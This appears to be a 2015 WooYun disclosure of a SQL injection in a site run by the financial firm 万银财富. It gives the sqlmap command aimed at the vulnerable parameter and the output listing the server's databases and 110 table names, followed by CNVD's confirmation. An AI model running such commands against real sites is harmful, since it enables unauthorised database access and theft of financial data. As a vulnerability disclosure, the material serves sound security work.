当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140900

漏洞标题:万银财富主站又一注射疑似众多数据泄露

相关厂商:万银财富

漏洞作者: 冷白开。

提交时间:2015-09-17 12:28

修复时间:2015-11-04 10:54

公开时间:2015-11-04 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-17: 细节已通知厂商并且等待厂商处理中
2015-09-20: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-30: 细节向核心白帽子及相关领域专家公开
2015-10-10: 细节向普通白帽子公开
2015-10-20: 细节向实习白帽子公开
2015-11-04: 细节向公众公开

简要描述:

万银财富主站又一注射(不同库)/疑似众多数据泄露

详细说明:

sqlmap.py -u "http://**.**.**.**/index.php?m=instarea&c=infund&inst_code=80000220" --dbs


1.png


available databases [6]:
[*] caihui
[*] caihui1
[*] cqgd
[*] information_schema
[*] mysql
[*] performance_schema
Database: caihui
[110 tables]
+--------------------------+
| assetal |
| avgrmmonf |
| benchmark_comparison |
| bsheet |
| bsheet_new |
| bsholding |
| cfip |
| cfprofile |
| cfunds_net_wy |
| cfunds_net_wy_3 |
| chgrf |
| chgrf_f |
| cihdquote |
| company_rating_wy |
| csholding |
| csrcappfin |
| curfscode |
| curnav_der |
| cxfundname |
| dernav |
| dhistory |
| dhistory_dispara |
| dispara_fund |
| downstate |
| dsmeeting |
| encurnav_der |
| etfcrinfo |
| etfcrstocks |
| fcmg |
| fcowner |
| fcshare |
| fegather |
| fhdquote |
| fholder |
| fholder_chg |
| finfo |
| fparty |
| fpchg |
| fratios |
| fshare |
| fsmeeting |
| fund_benchmark |
| fundbdy |
| fundda |
| fundiconvert |
| fundmg |
| fundsaiv |
| fundshare_chg |
| fundsta |
| fundtypes |
| icst |
| icst_new |
| ifundos |
| iport |
| iport_s |
| itprofile |
| jjglr |
| jjtgr |
| jjtzbz |
| jjxldy |
| jjxljj |
| lfshare |
| mfdhispd |
| mfdhistory |
| nav |
| nav_cur |
| new_funds_index_wy |
| newsfin |
| newstext |
| ntrad |
| ofip |
| ofprofile |
| prizestate |
| profchg |
| qdbhold |
| qdfhold |
| qdiport |
| qdshold |
| rating_wy |
| risk_assessment_wy |
| scfp |
| scfp_new |
| securitycode |
| sholding |
| sholding_s |
| sqlexecute |
| symbol_comp |
| tab_temp_kdj |
| tab_temp_kdj_lh |
| temp_aa |
| temp_bonus |
| temp_company_stat |
| temp_fundtype_wy |
| temp_gr_year |
| temp_info_new |
| temp_issue |
| temp_main_fund |
| temp_manager_new |
| temp_manager_performance |
| temp_nav_cfund |
| temp_nav_curfund |
| temp_nav_ofund |
| temp_nav_strufund |
| temp_split |
| temp_status |
| tradedate |
| tsmeeting |
| tstat |
| unicst_new |
| uplog |
+--------------------------+

漏洞证明:

综上

修复方案:

你们大牛多

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-20 10:53

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论